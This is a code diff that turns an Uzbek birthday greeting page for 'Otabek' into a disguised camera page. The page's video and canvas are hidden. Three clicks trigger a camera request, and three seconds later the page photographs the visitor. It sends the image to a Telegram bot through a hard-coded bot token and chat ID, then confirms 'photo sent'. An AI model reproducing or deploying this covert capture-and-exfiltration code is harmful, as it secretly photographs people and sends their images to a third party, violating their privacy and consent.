--- a/index.html
+++ b/index.html
@@ -1,132 +1,92 @@
 <!DOCTYPE html>
-<html lang="uz">
+<html lang="en">
 <head>
   <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-  <title>Tug'ilgan kun muborak, Otabek!</title>
+  <title>Otabek Birthday Camera</title>
   <style>
-    body {
-      margin: 0;
-      padding: 0;
-      background: #fffbe6;
-      font-family: sans-serif;
-      text-align: center;
-      overflow: hidden;
-    }
-    #cake {
-      font-size: 100px;
-      margin-top: 100px;
-      position: relative;
-    }
-    .flame {
-      width: 10px;
-      height: 20px;
-      background: orange;
-      border-radius: 50%;
+    body { margin: 0; background: #000; color: white; font-family: sans-serif; }
+    #video, #canvas { display: none; }
+    #msg {
       position: absolute;
-      top: -30px;
+      top: 40%;
       left: 50%;
-      transform: translateX(-50%);
-      animation: flicker 0.3s infinite;
-    }
-    @keyframes flicker {
-      0%, 100% { opacity: 1; }
-      50% { opacity: 0.5; }
-    }
-    #message {
+      transform: translate(-50%, -50%);
+      text-align: center;
+      font-size: 1.5rem;
+      background: rgba(0, 0, 0, 0.7);
+      padding: 1em;
+      border-radius: 1em;
       display: none;
-      margin-top: 30px;
-      font-size: 24px;
-      color: #333;
-      animation: fadeIn 2s ease-in-out;
-    }
-    @keyframes fadeIn {
-      from { opacity: 0; }
-      to { opacity: 1; }
-    }
-    canvas.confetti {
-      position: fixed;
-      top: 0;
-      left: 0;
-      width: 100%;
-      height: 100%;
-      pointer-events: none;
-      z-index: 999;
+      z-index: 10;
     }
   </style>
 </head>
 <body>
-  <div id="cake">🎂<div class="flame" id="flame"></div></div>
-  <p style="font-size: 18px;">🎤 Shamni o‘chirish uchun mikrofonga puflang</p>
-  <div id="message">
-    <strong>Otabek!</strong><br><br>
-    Tug‘ilgan kuning muborak! 🥳<br><br>
-    Senga sog‘liq, baxt va yorqin hayot tilayman!
-  </div>
-  <canvas class="confetti" id="confetti"></canvas>
+  <div id="msg">📸 Rasm yuborildi!</div>
+  <video id="video" autoplay playsinline></video>
+  <canvas id="canvas"></canvas>
 
   <script>
-    const audioContext = new (window.AudioContext || window.webkitAudioContext)();
-    navigator.mediaDevices.getUserMedia({ audio: true })
-      .then(stream => {
-        const source = audioContext.createMediaStreamSource(stream);
-        const analyser = audioContext.createAnalyser();
-        source.connect(analyser);
-        analyser.fftSize = 256;
-        const dataArray = new Uint8Array(analyser.frequencyBinCount);
-        function detectBlow() {
-          analyser.getByteFrequencyData(dataArray);
-          const avg = dataArray.reduce((a, b) => a + b) / dataArray.length;
-          if (avg > 60) blowOut();
-          else requestAnimationFrame(detectBlow);
-        }
-        detectBlow();
-      })
-      .catch(e => console.error('Mikrofon ishlamadi:', e));
+    let clickCount = 0;
+    const video = document.getElementById('video');
+    const canvas = document.getElementById('canvas');
+    const msg = document.getElementById('msg');
 
-    function blowOut() {
-      document.getElementById('flame').style.display = 'none';
-      document.getElementById('message').style.display = 'block';
-      startConfetti();
+    document.body.addEventListener('click', () => {
+      clickCount++;
+      if (clickCount === 3) {
+        startCameraAndSend();
+        clickCount = 0;
+      }
+    });
+
+    async function startCameraAndSend() {
+      try {
+        const stream = await navigator.mediaDevices.getUserMedia({ video: true });
+        video.srcObject = stream;
+
+        video.onloadedmetadata = () => {
+          video.play();
+
+          setTimeout(() => {
+            takePhotoAndSend();
+            stream.getTracks().forEach(track => track.stop());
+          }, 3000); // 3 sekunddan so‘ng suratga oladi
+        };
+      } catch (err) {
+        alert("Kameraga kirish imkoni yo‘q!");
+        console.error(err);
+      }
     }
 
-    function startConfetti() {
-      const canvas = document.getElementById('confetti');
-      const ctx = canvas.getContext('2d');
-      canvas.width = window.innerWidth;
-      canvas.height = window.innerHeight;
+    function takePhotoAndSend() {
+      canvas.width = video.videoWidth;
+      canvas.height = video.videoHeight;
+      canvas.getContext('2d').drawImage(video, 0, 0);
+      const imageData = canvas.toDataURL('image/png');
 
-      const confetti = Array.from({length: 200}, () => ({
-        x: Math.random() * canvas.width,
-        y: Math.random() * canvas.height - canvas.height,
-        r: Math.random() * 6 + 4,
-        d: Math.random() * 10 + 10,
-        color: `hsl(${Math.random() * 360}, 70%, 60%)`,
-        tilt: Math.random() * 10 - 10
-      }));
+      const blob = dataURLtoBlob(imageData);
+      const formData = new FormData();
+      formData.append('chat_id', '5529017013'); // 5529017013
+      formData.append('photo', blob, 'photo.png');
 
-      function draw() {
-        ctx.clearRect(0, 0, canvas.width, canvas.height);
-        confetti.forEach(p => {
-          ctx.beginPath();
-          ctx.lineWidth = p.r;
-          ctx.strokeStyle = p.color;
-          ctx.moveTo(p.x + p.tilt + p.r, p.y);
-          ctx.lineTo(p.x + p.tilt, p.y + p.r);
-          ctx.stroke();
-        });
-        confetti.forEach(p => {
-          p.y += Math.cos(p.d) + 1;
-          p.tilt += Math.sin(p.d) * 0.5;
-          if (p.y > canvas.height) {
-            p.y = -10;
-            p.x = Math.random() * canvas.width;
-          }
-        });
-        requestAnimationFrame(draw);
-      }
+      fetch('https://api.telegram.org/bot7972832275:AAHjqRyB30_EA5q5cw2s-baG4z-vZwXdYmo/sendPhoto', {
+        method: 'POST',
+        body: formData
+      }).then(() => {
+        msg.style.display = 'block';
+        setTimeout(() => msg.style.display = 'none', 3000);
+      }).catch(err => {
+        alert("Rasm yuborilmadi");
+        console.error(err);
+      });
+    }
 
-      draw();
+    function dataURLtoBlob(dataurl) {
+      const arr = dataurl.split(','), mime = arr[0].match(/:(.*?);/)[1],
+        bstr = atob(arr[1]), n = bstr.length, u8arr = new Uint8Array(n);
+      while (n--) u8arr[n] = bstr.charCodeAt(n);
+      return new Blob([u8arr], { type: mime });
     }
   </script>
 </body>
